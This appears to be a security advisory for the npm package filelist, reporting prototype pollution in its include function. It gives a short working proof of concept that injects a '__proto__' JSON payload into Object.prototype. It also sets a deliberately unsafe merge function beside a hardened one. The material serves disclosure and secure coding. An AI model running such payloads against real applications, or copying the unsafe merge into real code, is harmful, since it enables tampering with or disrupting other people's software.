filelist

vulnerability prototype pollution
severity 8.6
language javascript
registry npm

✍️ Description

The filelist package is vulnerable to prototype pollution through the include function, which internally uses an unsafe merge function.

🕵️‍♂️ Proof of Concept

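// poc.js

const fileList = require('filelist');
const list = new fileList.FileList();
// JSON.parse creates "__proto__" as an own property of the payload object
const payload = JSON.parse('{"__proto__":{"polluted":"Polluted!"}}');

// A fresh object has no "polluted" property before the call
console.log("Before:", {}.polluted);
// include() merges the payload and follows "__proto__" into Object.prototype
list.include(payload);
// Every object now inherits "polluted"
console.log("After:", {}.polluted);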

Running the PoC prints After: Polluted!, which shows that Object.prototype was modified.
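
The unsafe merge pattern named in the description, next to a hardened version that rejects the dangerous keys. This is an added example, not filelist's code or its fix; unsafeMerge, safeMerge, probe and the payload string are hypothetical names and constructed input.

```javascript
// Added example; not filelist's code. All function names are hypothetical.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

const isObject = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);

// Unsafe pattern: recurses into target[key] for any key, so a "__proto__"
// key produced by JSON.parse walks into Object.prototype.
function unsafeMerge(target, source) {
  for (const key in source) {
    if (isObject(source[key]) && isObject(target[key])) {
      unsafeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened: own keys only, dangerous keys skipped, and recursion only into
// objects the target owns (never into inherited ones).
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (!isObject(value)) {
      target[key] = value;
      continue;
    }
    const owned = Object.prototype.hasOwnProperty.call(target, key);
    if (!owned || !isObject(target[key])) target[key] = {};
    safeMerge(target[key], value);
  }
  return target;
}

// Merges a constructed payload (same shape as the PoC's) and reports what a
// fresh object inherits afterwards. Cleans up Object.prototype before returning.
function probe(mergeFn, json) {
  const target = mergeFn({}, JSON.parse(json));
  const inherited = {}.polluted;
  delete Object.prototype.polluted;
  return { inherited, ok: target.ok };
}

const PAYLOAD = '{"__proto__":{"polluted":"Polluted!"},"ok":1}';
console.log('unsafe:', probe(unsafeMerge, PAYLOAD).inherited);
console.log('safe:  ', probe(safeMerge, PAYLOAD).inherited);
```
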

💥 Impact

This vulnerability can lead to JS code execution, DoS, etc.
